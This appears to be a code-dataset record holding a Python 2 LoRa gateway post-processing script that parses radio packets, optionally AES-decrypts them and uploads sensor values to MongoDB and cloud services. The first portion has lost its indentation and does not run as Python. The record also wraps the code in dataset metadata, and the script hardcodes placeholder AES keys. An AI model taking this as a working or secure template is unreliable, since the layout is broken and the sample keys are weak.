while iteration < len(data_array)-1 :
#last iteration, do not add "," at the end
if iteration == len(data_array)-2 :
str_json_data += "\""+data_array[iteration]+"\" : "+data_array[iteration+1]
else :
str_json_data += "\""+data_array[iteration]+"\" : "+data_array[iteration+1]+", "
iteration += 2
str_json_data += "}"
#creating document to add
doc = {
"type" : ptypestr,
"gateway_eui" : _gwaddr,
"node_eui" : src,
"snr" : SNR,
"rssi" : RSSI,
"cr" : cr,
"datarate" : "SF"+str(sf)+"BW"+str(bw),
"time" : now,
"data" : json.dumps(json.loads(str_json_data))
}
#adding the document
add_document(doc)
print("MongoDB: saving done")
# get number of '/' separator
nslash = ldata.count('/')
index_first_data = 2
if nslash==0:
# old syntax without nomenclature key
index_first_data=2
else:
# new syntax with nomenclature key
index_first_data=3
#------------------
#test for thingspeak
#------------------
if (_thingspeak):
second_data=str(seq)
if (_thingspeaksnr):
second_data=str(SNR)
#data to send to thingspeak
data = []
data.append(data_array[0]) #channel (if '' default)
data.append(data_array[1]) #field (if '' default)
data.append(data_array[index_first_data]) #value to add (the first sensor value in data_array)
#upload data to thingspeak
#JUST FOR UPLOAD A SINGLE DATA IN A SPECIFIC FIELD AND SECOND DATA
thingspeak_uploadSingleData(data, second_data)
# if you want to upload all data starting at field 1, uncomment next line, and comment previous line
#thingspeak_uploadMultipleData(data_array) # upload all data in the fields
#------------------
#test for FIWARE
#need FIWARE access
#------------------
if (_fiware):
print("FIWARE: upload")
#entity_id = 'test_item_'+now.isoformat()
entity_id = 'sensor%d'% (src)
#send the first sensor value in data_array
cmd = 'python ./fiware_UpdateEntityAttribute.py '+entity_id+' test temperature float '+data_array[index_first_data]
print("FiWare: will issue python script")
print(cmd)
args = cmd.split()
try:
out = subprocess.check_output(args, shell=False)
except subprocess.CalledProcessError:
print("FiWare: python script failed")
if out.find('"reasonPhrase" : "OK"') > 0:
print("FiWare: Entity updated with ENTITY_ID "+entity_id)
else:
print("FiWare: Entity update failed")
#------------------
#test for sensorcloud
#------------------
if (_sensorcloud) :
#send the first sensor value in data_array
sensorcloud_uploadSingleData(data_array[index_first_data])
#------------------
#test for grovestreams
#------------------
if (_grovestreams):
nomenclatures = []
data = []
if nslash==0:
# old syntax without nomemclature key, so insert only one key
nomenclatures.append("temp")
data.append(data_array[index_first_data])
else:
#completing nomenclatures and data
i=2
while i < len(data_array)-1 :
nomenclatures.append(data_array[i])
data.append(data_array[i+1])
i += 2
#upload data to grovestreams
grovestreams_uploadSingleData(nomenclatures, data, str(src))
# END
#////////////////////////////////////////////////////////////
else: # not a known data logging prefix
#you may want to upload to a default service
#so just implement it here
print('unrecognized data logging prefix: discard data')
getAllLine()
else:
print('invalid app key: discard data')
getAllLine()
continue
# handle binary prefixes
if (ch == '\xFF' or ch == '+'):
#if (ch == '\xFF'):
print("got first framing byte")
ch=getSingleChar()
# data prefix for non-encrypted data
if (ch == '\xFE' or ch == '+'):
#if (ch == '\xFE'):
#the data prefix is inserted by the gateway
#do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)
print("--> got data prefix")
#we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage
#if _wappkey is set then we have to first indicate that _validappkey=0
if (_wappkey==1):
_validappkey=0
else:
_validappkey=1
# if we have raw output from gw, then try to determine which kind of packet it is
if (_rawFormat==1):
ch=getSingleChar()
# probably our modified Libelium header where the destination is the gateway
# dissect our modified Libelium format
if ch==1:
dst=ord(ch)
ptype=ord(getSingleChar())
src=ord(getSingleChar())
seq=ord(getSingleChar())
print("Libelium[dst=%d ptype=0x%.2X src=%d seq=%d]" % (dst,ptype,src,seq))
# now we read datalen-4 (the header length) bytes in our line buffer
fillLinebuf(datalen-HEADER_SIZE)
# TODO: dissect LoRaWAN
# you can implement LoRaWAN decoding if this is necessary for your system
# look at the LoRaWAN packet format specification to dissect the packet in detail
#
# LoRaWAN uses the MHDR(1B)
# ----------------------------
# | 7 6 5 | 4 3 2 | 1 0 |
# ----------------------------
# MType RFU major
#
# the main MType is unconfirmed data up which value is 010
if (ch & 0x40)==0x40:
# Do the LoRaWAN decoding
print("LoRaWAN?")
# for the moment just discard the data
fillLinebuf(datalen-1)
getAllLine()
else:
# now we read datalen bytes in our line buffer
fillLinebuf(datalen)
# encrypted data payload?
if ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):
print("--> DATA encrypted: encrypted payload size is %d" % datalen)
_hasClearData=0
if _aes==1:
print("--> decrypting")
decrypt_handler = AES.new(aes_key, AES.MODE_CBC, aes_iv)
# decrypt
s = decrypt_handler.decrypt(_linebuf)
for i in range(0, len(s)):
print "%.2X " % ord(s[i]),
print "\nEnd"
# get the real (decrypted) payload size
rsize = ord(s[APPKEY_SIZE])
print("--> real payload size is %d" % rsize)
# then add the appkey + the appkey framing bytes
rsize = rsize+APPKEY_SIZE+1
_linebuf = s[:APPKEY_SIZE] + s[APPKEY_SIZE+1:rsize]
for i in range(0, len(_linebuf)):
print "%.2X " % ord(_linebuf[i]),
print "\nEnd"
# normally next read from input will get data from the decrypted _linebuf
print "--> decrypted payload is: ",
print _linebuf[APPKEY_SIZE:]
_hasClearData=1
else:
print("--> DATA encrypted: aes not activated")
# drain stdin of all the encrypted data
enc_data=getAllLine()
print("--> discard encrypted data")
else:
_hasClearData=1
# with_appkey?
if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1):
print("--> DATA with_appkey: read app key sequence")
the_app_key = getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
print "app key is ",
print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key)
if the_app_key in app_key_list:
print("in app key list")
if _wappkey==1:
_validappkey=1
else:
print("not in app key list")
if _wappkey==1:
_validappkey=0
else:
#we do not check for app key
_validappkey=1
print("but app key disabled")
continue
if (ch == '?' and _ignoreComment==1):
sys.stdin.readline()
continue
sys.stdout.write(ch)
|
normal
|
{
"blob_id": "475cb57ce5fda0d0389bfa1b9b227a2147e1abde",
"index": 9389,
"step-1": "#------------------------------------------------------------\n# Copyright 2016 Congduc Pham, University of Pau, France.\n# \n# Congduc.Pham@univ-pau.fr\n#\n# This file is part of the low-cost LoRa gateway developped at University of Pau\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with the program. If not, see <http://www.gnu.org/licenses/>.\n#------------------------------------------------------------\n\n# IMPORTANT\n# Parts that can be modified are identified with\n\n#////////////////////////////////////////////////////////////\n# TEXT\n\n# END\n#////////////////////////////////////////////////////////////\n\nimport sys\nimport select\nimport threading\nfrom threading import Timer\nimport time\nimport datetime\nimport getopt\nimport os\nimport json\nimport re\n\n#////////////////////////////////////////////////////////////\n# ADD HERE BOOLEAN VARIABLES TO SUPPORT OTHER CLOUDS\n# OR VARIABLES FOR YOUR OWN NEEDS \n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#with firebase support?\n#------------------------------------------------------------\n_firebase=False\n\n#------------------------------------------------------------\n#with thingspeak support?\n#------------------------------------------------------------\n_thingspeak=False\n#plot snr instead of seq\n_thingspeaksnr=False\n\n#------------------------------------------------------------\n#with sensorcloud support?\n#------------------------------------------------------------\n_sensorcloud=False\n\n#------------------------------------------------------------\n#with grovestreams support?\n#------------------------------------------------------------\n_grovestreams=False\n\n#------------------------------------------------------------\n#with fiware support?\n#------------------------------------------------------------\n_fiware=False\n\n#////////////////////////////////////////////////////////////\n# ADD HERE APP KEYS THAT YOU WANT TO ALLOW FOR YOUR GATEWAY\n#////////////////////////////////////////////////////////////\n# NOTE: the format of the application key list has changed from \n# a list of list, to a list of string that will be process as \n# a byte array. Doing so wilL allow for dictionary construction\n# using the appkey to retrieve information such as encryption key,...\n\napp_key_list = [\n\t#for testing\n\t'****',\n\t#change here your application key\n\t'\\x01\\x02\\x03\\x04',\n\t'\\x05\\x06\\x07\\x08' \n]\n\n#////////////////////////////////////////////////////////////\n#FOR AES DECRYPTION\n#////////////////////////////////////////////////////////////\n\n#put your key here, should match the end-device's key\naes_key=\"0123456789010123\"\n#put your initialisation vector here, should match the end-device's initialisation vector\naes_iv=\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\"\n#aes_iv=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\n#association between appkey and aes_key\nappkey_aeskey = {\n\t'\\x01\\x02\\x03\\x04':\"0123456789010123\",\n\t'\\x05\\x06\\x07\\x08':\"0123456789010123\"\n}\n\n#association between appkey and aes_iv\nappkey_aesiv = {\n\t'\\x01\\x02\\x03\\x04':\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\",\n\t'\\x05\\x06\\x07\\x08':\"\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\\x9a\\xd0\\x30\\x02\\x00\\x00\\x00\\x00\"\n}\n\n# END\n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#header packet information\n#------------------------------------------------------------\n\nHEADER_SIZE=4\nAPPKEY_SIZE=4\nPKT_TYPE_DATA=0x10\nPKT_TYPE_ACK=0x20\n\nPKT_FLAG_ACK_REQ=0x08\nPKT_FLAG_DATA_ENCRYPTED=0x04\nPKT_FLAG_DATA_WAPPKEY=0x02\nPKT_FLAG_DATA_ISBINARY=0x01\n\n#------------------------------------------------------------\n#last pkt information\n#------------------------------------------------------------\ndst=0\nptype=0\nptypestr=\"N/A\"\nsrc=0\nseq=0\ndatalen=0\nSNR=0\nRSSI=0\nbw=0\ncr=0\nsf=0\n#------------------------------------------------------------\n\n#------------------------------------------------------------\n#will ignore lines beginning with '?'\n#------------------------------------------------------------\n_ignoreComment=1\n\n#------------------------------------------------------------\n#with mongoDB support?\n#------------------------------------------------------------\n_mongodb = False\n\n#------------------------------------------------------------\n#log gateway message?\n#------------------------------------------------------------\n_logGateway=0\n\n#------------------------------------------------------------\n#raw output from gateway?\n#------------------------------------------------------------\n_rawFormat=0\n#------------------------------------------------------------\n_ourcustomFormat=0;\n_lorawanFormat=0\n#------------------------------------------------------------\n\n#------------------------------------------------------------\n#check for app key?\n#------------------------------------------------------------\n_wappkey=0\n#------------------------------------------------------------\nthe_app_key = '\\x00\\x00\\x00\\x00'\n\n#valid app key? by default we do not check for the app key\n_validappkey=1\n\n#------------------------------------------------------------\n#for local AES decrypting\n#------------------------------------------------------------\t\n_aes=0\n_hasClearData=0\n\n#------------------------------------------------------------\n#open json file to recover gateway_address\n#------------------------------------------------------------\nf = open(os.path.expanduser(\"local_conf.json\"),\"r\")\nlines = f.readlines()\nf.close()\narray = \"\"\n#get all the lines in a string\nfor line in lines :\n\tarray += line\n\n#change it into a python array\njson_array = json.loads(array)\n\n#set the gateway_address for having different log filenames\n_gwaddr = json_array[\"gateway_conf\"][\"gateway_ID\"]\n\n#////////////////////////////////////////////////////////////\n# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES\n#////////////////////////////////////////////////////////////\n_folder_path = \"/home/pi/Dropbox/LoRa-test/\"\n_gwlog_filename = _folder_path+\"gateway_\"+str(_gwaddr)+\".log\"\n_telemetrylog_filename = _folder_path+\"telemetry_\"+str(_gwaddr)+\".log\"\n\n# END\n#////////////////////////////////////////////////////////////\n\n\n#------------------------------------------------------------\n#initialize gateway DHT22 sensor\n#------------------------------------------------------------\n_gw_dht22 = json_array[\"gateway_conf\"][\"dht22\"]\n_date_save_dht22 = None\n\nif(_gw_dht22):\n\tprint \"Use DHT22 to get gateway temperature and humidity level\"\n\t#read values from dht22 in the gateway box\n\tsys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))\n\tfrom read_dht22 import get_dht22_values\n\t\n\t_temperature = 0\n\t_humidity = 0\n\n# retrieve dht22 values\ndef save_dht22_values():\n\tglobal _temperature, _humidity, _date_save_dht22\n\t_humidity, _temperature = get_dht22_values()\n\t\n\t_date_save_dht22 = datetime.datetime.utcnow()\n\n\tprint \"Gateway TC : \"+_temperature+\" C | HU : \"+_humidity+\" % at \"+str(_date_save_dht22)\n\t\n\t#save values from the gateway box's DHT22 sensor, if _mongodb is true\n\tif(_mongodb):\n\t\t#saving data in a JSON var\n\t\tstr_json_data = \"{\\\"th\\\":\"+_temperature+\", \\\"hu\\\":\"+_humidity+\"}\"\n\t\n\t\t#creating document to add\n\t\tdoc = {\n\t\t\t\"type\" : \"DATA_GW_DHT22\",\n\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\"node_eui\" : \"gw\",\n\t\t\t\"snr\" : \"\", \n\t\t\t\"rssi\" : \"\", \n\t\t\t\"cr\" : \"\", \n\t\t\t\"datarate\" : \"\", \n\t\t\t\"time\" : _date_save_dht22,\n\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t}\n\t\n\t\t#adding the document\n\t\tadd_document(doc)\n\t\ndef dht22_target():\n\twhile True:\n\t\tprint \"Getting gateway temperature\"\n\t\tsave_dht22_values()\n\t\tsys.stdout.flush()\t\n\t\tglobal _gw_dht22\n\t\ttime.sleep(_gw_dht22)\n\n\n#------------------------------------------------------------\n#for managing the input data when we can have aes encryption\n#------------------------------------------------------------\n_linebuf=\"the line buffer\"\n_linebuf_idx=0\n_has_linebuf=0\n\ndef getSingleChar():\n\tglobal _has_linebuf\n\t# if we have a valid _linebuf then read from _linebuf\n\tif _has_linebuf==1:\n\t\tglobal _linebuf_idx\n\t\tglobal _linebuf\n\t\tif _linebuf_idx < len(_linebuf):\n\t\t\t_linebuf_idx = _linebuf_idx + 1\n\t\t\treturn _linebuf[_linebuf_idx-1]\n\t\telse:\n\t\t\t# no more character from _linebuf, so read from stdin\n\t\t\t_has_linebuf = 0\n\t\t\treturn sys.stdin.read(1)\n\telse:\n\t\treturn sys.stdin.read(1)\t\n\t\ndef getAllLine():\n\tglobal _linebuf_idx\n\tp=_linebuf_idx\n\t_linebuf_idx = 0\n\tglobal _has_linebuf\n\t_has_linebuf = 0\t\n\tglobal _linebuf\n\t# return the remaining of the string and clear the _linebuf\n\treturn _linebuf[p:]\t\n\t\ndef fillLinebuf(n):\n\tglobal _linebuf_idx\n\t_linebuf_idx = 0\n\tglobal _has_linebuf\n\t_has_linebuf = 1\n\tglobal _linebuf\n\t# fill in our _linebuf from stdin\n\t_linebuf=sys.stdin.read(n)\n\n\n#////////////////////////////////////////////////////////////\n# ADD HERE OPTIONS THAT YOU MAY WANT TO ADD\n# BE CAREFUL, IT IS NOT ADVISED TO REMOVE OPTIONS UNLESS YOU\n# REALLY KNOW WHAT YOU ARE DOING\n#////////////////////////////////////////////////////////////\n\n#------------------------------------------------------------\n#for parsing the options\n#------------------------------------------------------------\n\ndef main(argv):\n\ttry:\n\t\topts, args = getopt.getopt(argv,'iftLam:',[\\\n\t\t'ignorecomment',\\\n\t\t'firebase',\\\n\t\t'thingspeak',\\\n\t\t'retrythsk',\\\n\t\t'thingspeaksnr',\\\n\t\t'fiware',\\\n\t\t'sensorcloud',\\\n\t\t'grovestreams',\\\n\t\t'loggw',\\\n\t\t'addr',\\\n\t\t'wappkey',\\\n\t\t'raw',\\\n\t\t'aes',\\\n\t\t'mongodb'])\n\t\t\n\texcept getopt.GetoptError:\n\t\tprint 'post_processing_gw '+\\\n\t\t'-i/--ignorecomment '+\\\n\t\t'-f/--firebase '+\\\n\t\t'-t/--thingspeak '+\\\n\t\t'--retrythsk '+\\\n\t\t'--thingspeaksnr '+\\\n\t\t'--fiware '+\\\n\t\t'--sensorcloud '+\\\n\t\t'--grovestreams '+\\\n\t\t'-L/--loggw '+\\\n\t\t'-a/--addr '+\\\n\t\t'--wappkey '+\\\n\t\t'--raw '+\\\n\t\t'--aes '+\\\n\t\t'-m/--mongodb'\n\t\t\n\t\tsys.exit(2)\n\t\n\tfor opt, arg in opts:\n\t\tif opt in (\"-i\", \"--ignorecomment\"):\n\t\t\tprint(\"will ignore commented lines\")\n\t\t\tglobal _ignoreComment\n\t\t\t_ignoreComment = 1\n\t\t\t\n\t\telif opt in (\"-f\", \"--firebase\"):\n\t\t\tprint(\"will enable firebase support\")\n\t\t\tglobal _firebase\n\t\t\t_firebase = True\n\t\t\tglobal firebase_uploadSingleData\n\t\t\tfrom FireBase import firebase_uploadSingleData\n\n\t\telif opt in (\"-t\", \"--thingspeak\"):\n\t\t\tprint(\"will enable thingspeak support\")\n\t\t\tglobal _thingspeak\n\t\t\t_thingspeak = True\n\t\t\tglobal thingspeak_uploadSingleData, thingspeak_uploadMultipleData\n\t\t\tfrom ThingSpeak import thingspeak_uploadSingleData, thingspeak_uploadMultipleData\n\t\t\t\n\t\telif opt in (\"--retrythsk\"):\n\t\t\tprint(\"will enable thingspeak retry\")\n\t\t\tglobal thingspeak_setRetry\n\t\t\tfrom ThingSpeak import thingspeak_setRetry\n\t\t\t#set retry to True\n\t\t\tthingspeak_setRetry(True)\n\n\t\telif opt in (\"--thingspeaksnr\"):\n\t\t\tprint(\"will plot snr instead of seq\")\n\t\t\tglobal _thingspeaksnr\n\t\t\t_thingspeaksnr = True\n\t\t\t\n\t\telif opt in (\"--fiware\"):\n\t\t\tprint(\"will enable fiware support\")\n\t\t\tglobal _fiware\n\t\t\t_fiware = True\n\n\t\telif opt in (\"--sensorcloud\"):\n\t\t\tprint(\"will enable sensorcloud support\")\n\t\t\tglobal _sensorcloud\n\t\t\t_sensorcloud = True\n\t\t\tglobal sensorcloud_uploadSingleData\n\t\t\tfrom SensorCloud import sensorcloud_uploadSingleData\n\n\t\telif opt in (\"--grovestreams\"):\n\t\t\tprint(\"will enable grovestreams support\")\n\t\t\tglobal _grovestreams\n\t\t\t_grovestreams = True\n\t\t\tglobal grovestreams_uploadSingleData\n\t\t\tfrom GroveStreams import grovestreams_uploadSingleData\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\telif opt in (\"-L\", \"--loggw\"):\n\t\t\tprint(\"will log gateway message prefixed by ^$\")\n\t\t\tglobal _logGateway\n\t\t\t_logGateway = 1\t\n\n\t\telif opt in (\"-a\", \"--addr\"):\n\t\t\tglobal _gwaddr\n\t\t\t_gwaddr = arg\n\t\t\tprint(\"overwrite: will use _\"+str(_gwaddr)+\" for gateway and telemetry log files\")\n\t\t\t\n\t\telif opt in (\"--wappkey\"):\n\t\t\tglobal _wappkey\n\t\t\t_wappkey = 1\n\t\t\tglobal _validappkey\n\t\t\t_validappkey=0\n\t\t\tprint(\"will check for correct app key\")\n\n\t\telif opt in (\"--raw\"):\n\t\t\tglobal _rawFormat\n\t\t\t_rawFormat = 1\n\t\t\tprint(\"raw output from gateway. post_processing_gw will handle packet format\")\n\t\t\t\n\t\telif opt in (\"--aes\"):\n\t\t\tglobal _aes\n\t\t\t_aes = 1\n\t\t\tglobal AES\n\t\t\tfrom Crypto.Cipher import AES\n\t\t\tprint(\"enable AES encrypted data\")\n\t\t\t\t\t\t\n\t\telif opt in (\"-m\", \"--mongodb\"):\n\t\t\tprint(\"will enable local MongoDB support, max months to store is \"+arg)\n\t\t\tglobal _mongodb\n\t\t\t_mongodb = True\n\t\t\t\n\t\t\tglobal add_document, remove_if_new_month, mongodb_set_max_months\n\t\t\tfrom MongoDB import add_document, remove_if_new_month, mongodb_set_max_months\n\t\t\t#setting max months\n\t\t\tmongodb_set_max_months(int(arg))\n\n# END\n#////////////////////////////////////////////////////////////\t\t\t\n\t\t\t\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n\n#gateway dht22\nif (_gw_dht22):\n\tprint \"Starting thread to measure gateway temperature\"\n\tt = threading.Thread(target=dht22_target)\n\tt.daemon = True\n\tt.start()\n\nprint \"Current working directory: \"+os.getcwd()\n\nwhile True:\n\n\tsys.stdout.flush()\n \tch = getSingleChar()\n\n#expected prefixes\n#\t^p \tindicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet\n#\t\texample: ^p1,16,3,0,234,8,-45\n#\n#\t^r\tindicate a ctrl radio info ^rbw,cr,sf for the last received packet\n#\t\texample: ^r500,5,12\n#\n#\t^$\tindicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file \n#\t\texample: ^$Set LoRa mode 4\n#\n#\t^l\tindicates a ctrl LAS info ^lsrc(%d),type(%d)\n#\t\ttype is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA \n#\t\texample: ^l3,4\n#\n#\t\\$\tindicates a message that should be logged in the (Dropbox) telemetry.log file\n#\t\texample: \\$hello -> \thello will be logged in the following format\n#\t\t\t\t\t(src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello \n#\n#\t\\&\tindicates a message that should be logged in the firebase cloud database\n#\t\texample: \\&hello ->\thello will be logged in json format\n#\n#\t\\!\tindicates a message that should be logged on a thingspeak channel\n#\t\texample: \\!SGSH52UGPVAUYG3S#9.4 ->\t9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1\n#\t\t\t\t \\!2#9.4 -> 9.4 will be logged in the default channel at field 2\n#\t\t\t\t \\!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2\n#\n#\t\tyou can log other information such as src, seq, len, SNR and RSSI on specific fields\n#\n#\t\\xFF\\xFE\t\tindicates radio data prefix\n#\n#\n\n#------------------------------------------------------------\n# '^' is reserved for control information from the gateway\n#------------------------------------------------------------\n\n\tif (ch=='^'):\n\t\tnow = datetime.datetime.utcnow()\n\t\tch=sys.stdin.read(1)\n\t\t\n\t\tif (ch=='p'):\t\t\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint now.isoformat()\n\t\t\tprint \"rcv ctrl pkt info (^p): \"+data,\n\t\t\tarr = map(int,data.split(','))\n\t\t\tprint \"splitted in: \",\n\t\t\tprint arr\n\t\t\tdst=arr[0]\n\t\t\tptype=arr[1]\n\t\t\tptypestr=\"N/A\"\n\t\t\tif ((ptype & 0xF0)==PKT_TYPE_DATA):\n\t\t\t\tptypestr=\"DATA\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_ISBINARY)==PKT_FLAG_DATA_ISBINARY:\n\t\t\t\t\tptypestr = ptypestr + \" IS_BINARY\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:\n\t\t\t\t\tptypestr = ptypestr + \" WAPPKEY\"\n\t\t\t\tif (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:\n\t\t\t\t\tptypestr = ptypestr + \" ENCRYPTED\"\n\t\t\t\tif (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:\n\t\t\t\t\tptypestr = ptypestr + \" ACK_REQ\"\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tif ((ptype & 0xF0)==PKT_TYPE_ACK):\n\t\t\t\tptypestr=\"ACK\"\t\t\t\t\t\n\t\t\tsrc=arr[2]\n\t\t\tseq=arr[3]\n\t\t\tdatalen=arr[4]\n\t\t\tSNR=arr[5]\n\t\t\tRSSI=arr[6]\n\t\t\tif (_rawFormat==0):\t\n\t\t\t\tinfo_str=\"(dst=%d type=0x%.2X(%s) src=%d seq=%d len=%d SNR=%d RSSI=%d)\" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)\n\t\t\telse:\n\t\t\t\tinfo_str=\"rawFormat(len=%d SNR=%d RSSI=%d)\" % (datalen,SNR,RSSI)\t\n\t\t\tprint info_str\n\t\t\t# TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file\n\n\t\tif (ch=='r'):\t\t\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint \"rcv ctrl radio info (^r): \"+data,\n\t\t\tarr = map(int,data.split(','))\n\t\t\tprint \"splitted in: \",\n\t\t\tprint arr\n\t\t\tbw=arr[0]\n\t\t\tcr=arr[1]\n\t\t\tsf=arr[2]\n\t\t\tinfo_str=\"(BW=%d CR=%d SF=%d)\" % (bw,cr,sf)\n\t\t\tprint info_str\n\n\t\tif (ch=='t'):\n\t\t\trcv_timestamp = sys.stdin.readline()\n\t\t\tprint \"rcv timestamp (^t): \"+rcv_timestamp\n\t\t\t\t\t\t\t\t\t\n\t\tif (ch=='l'):\n\t\t\t# TODO: LAS service\t\n\t\t\tprint 'not implemented yet'\n\t\t\t\n\t\tif (ch=='$' and _logGateway==1):\n\t\t\tdata = sys.stdin.readline()\n\t\t\tprint \"rcv gw output to log (^$): \"+data,\n\t\t\tf=open(os.path.expanduser(_gwlog_filename),\"a\")\n\t\t\tf.write(now.isoformat()+'> ')\n\t\t\tf.write(data)\n\t\t\tf.close()\t\t\t\t\t\n\t\tcontinue\n\n\n#------------------------------------------------------------\n# '\\' is reserved for message logging service\n#------------------------------------------------------------\n\n\tif (ch=='\\\\'):\n\t\tnow = datetime.datetime.utcnow()\n\t\t\n\t\tif _validappkey==1:\n\n\t\t\tprint 'valid app key: accept data'\n\t\t\t\t\t\n\t\t\tch=getSingleChar()\t\t\t\n\t\t\t\t\t\n\t\t\tif (ch=='$'): #log on Dropbox\n\t\t\t\t\n\t\t\t\tdata = getAllLine()\n\t\t\t\t\n\t\t\t\tprint \"rcv msg to log (\\$) on dropbox: \"+data,\n\t\t\t\tf=open(os.path.expanduser(_telemetrylog_filename),\"a\")\n\t\t\t\tf.write(info_str+' ')\t\n\t\t\t\tf.write(now.isoformat()+'> ')\n\t\t\t\tf.write(data)\n\t\t\t\tf.close()\t\n\n\t\t\t#/////////////////////////////////////////////////////////////\n\t\t\t# YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS\n\t\t\t# WE PROVIDE EXAMPLES FOR THINGSPEAK, GROVESTREAM\n\t\t\t# IT IS ADVISED TO USE A SEPERATE PYTHON SCRIPT PER CLOUD\n\t\t\t#////////////////////////////////////////////////////////////\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\telif (ch=='&' and _firebase): #log on Firebase\n\t\t\t\t\n\t\t\t\tldata = getAllLine()\n\t\t\t\t\n\t\t\t\tprint 'rcv msg to log (\\&) on firebase: '+data\n\t\t\t\tfirebase_msg = {\n\t\t\t\t\t'dst':dst,\n\t\t\t\t\t'type':ptypestr,\n\t\t\t\t\t'gateway_eui' : _gwaddr,\t\t\t\t\t\n\t\t\t\t\t'node_eui':src,\n\t\t\t\t\t'seq':seq,\n\t\t\t\t\t'len':datalen,\n\t\t\t\t\t'snr':SNR,\n\t\t\t\t\t'rssi':RSSI,\n\t\t\t\t\t'cr' : cr, \n\t\t\t\t\t'datarate' : \"SF\"+str(sf)+\"BW\"+str(bw),\n\t\t\t\t\t'time':now.isoformat(),\n\t\t\t\t\t'info_str':info_str+' '+now.isoformat()+'> '+ldata,\t\t\t\t\t\n\t\t\t\t\t'data':ldata\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif _mongodb :\n\t\t\t\t\t#------------------\n\t\t\t\t\t#saving in MongoDB\n\t\t\t\t\t#------------------\n\t\t\t\t\t\n\t\t\t\t\t#get the data\n\t\t\t\t\tdata = ldata.split('/')\n\t\t\t\t\n\t\t\t\t\t#change data in two arrays : nomenclature_array and value_array\n\t\t\t\t\titeration = 0\n\t\t\t\t\tnomenclature_array = []\n\t\t\t\t\tvalue_array = []\n\t\t\t\t\twhile iteration<len(data) :\n\t\t\t\t\t\tif (iteration == 0 or iteration%2 == 0) :\n\t\t\t\t\t\t \tnomenclature_array.append(data[iteration])\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t \tvalue_array.append(data[iteration])\n\t\t\t\t\t\t \t\n\t\t\t\t\t\titeration += 1\n\t\t\t\t\n\t\t\t\t\t#check if new month\n\t\t\t\t\tremove_if_new_month(now)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving the document in the collection...\")\n\t\t\t\t\n\t\t\t\t\t#saving data in a JSON var\n\t\t\t\t\tstr_json_data = \"{\"\n\t\t\t\t\titeration = 0\n\t\t\t\t\twhile iteration < len(nomenclature_array) :\n\t\t\t\t\t\t#last iteration, do not add \",\" at the end\n\t\t\t\t\t\tif iteration == len(nomenclature_array)-1 :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+nomenclature_array[iteration]+\"\\\" : \"+value_array[iteration]\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+nomenclature_array[iteration]+\"\\\" : \"+value_array[iteration]+\", \"\n\t\t\t\t\t\titeration += 1\n\t\t\t\t\tstr_json_data += \"}\"\n\t\t\t\t\n\t\t\t\t\t#creating document to add\n\t\t\t\t\tdoc = {\n\t\t\t\t\t\t\"type\" : ptypestr,\n\t\t\t\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\t\t\t\"node_eui\" : src,\n\t\t\t\t\t\t\"snr\" : SNR, \n\t\t\t\t\t\t\"rssi\" : RSSI, \n\t\t\t\t\t\t\"cr\" : cr, \n\t\t\t\t\t\t\"datarate\" : \"SF\"+str(sf)+\"BW\"+str(bw), 